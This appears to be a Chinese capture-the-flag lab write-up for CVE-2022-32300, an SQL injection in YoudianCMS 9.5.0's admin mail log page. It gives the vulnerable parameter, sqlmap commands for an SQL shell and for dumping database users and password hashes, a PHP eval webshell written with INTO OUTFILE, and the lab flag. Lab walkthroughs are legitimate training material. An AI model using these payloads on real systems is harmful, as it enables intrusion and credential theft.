Vulfocus靶场-youdiancms 9.5.0 版本 SQL注入 (CVE-2022-32300)

简介

youdiancms 9.5.0 版本 SQL注入 (CVE-2022-32300)

启动靶场

访问启动的连接,得到靶场:
在这里插入图片描述
直接安装,按照这个来填写参数:
数据库:root/root 数据库名:youdian
在这里插入图片描述安装成功就可以使用系统了:
在这里插入图片描述
访问后台,输入刚刚配置的用户名和密码,就可以进入后台:
在这里插入图片描述

开始渗透

根据提示:
通过 /App/Lib/Action/Admin/MailAction.class.php 中的 MailSendID 参数发现 YoudianCMS v9.5.0 包含 SQL 注入漏洞。
这个地方需要去下载源码进行审计,发现访问路径:
/index.php/Admin/mail/viewLog?MailSendID=*

先对这个路径进行抓包

在这里插入图片描述
因为这个地方需要登录,所以把请求包复制到一个文本中req.txt:
在这里插入图片描述

然后再利用sqlmap进行测试

在这里插入图片描述
在这里插入图片描述
已经探测到存在SQL注入!

找到网站的绝对路径

通过目录扫描得到根目录有install.php
在这里插入图片描述
发现网站根路径是/var/www/wordpress。

直接写入webshell

SELECT '<?php eval($_REQUEST[6]);?> ' INTO OUTFILE '/var/www/wordpress/1.php';

通过SQLmap拿到 --sql-shell

python sqlmap.py -r req.txt --sql-shell

在这里插入图片描述
执行
在这里插入图片描述

爆数据库的用户名和密码

由于前面直接写码无法写入,只能通过数据库再去尝试写码
先读取用户名

python sqlmap.py -r req.txt --users

在这里插入图片描述
读取密码:

python sqlmap.py -r req.txt --passwords

在这里插入图片描述
再连接mysql :
在这里插入图片描述
写码:
在这里插入图片描述
在这里插入图片描述

连接蚁🗡:

在这里插入图片描述
拿到flag:
flag-{bmhc865116e-a96a-43a2-9bbc-1aa03a88321b}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Miracle_PHP|JAVA|安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值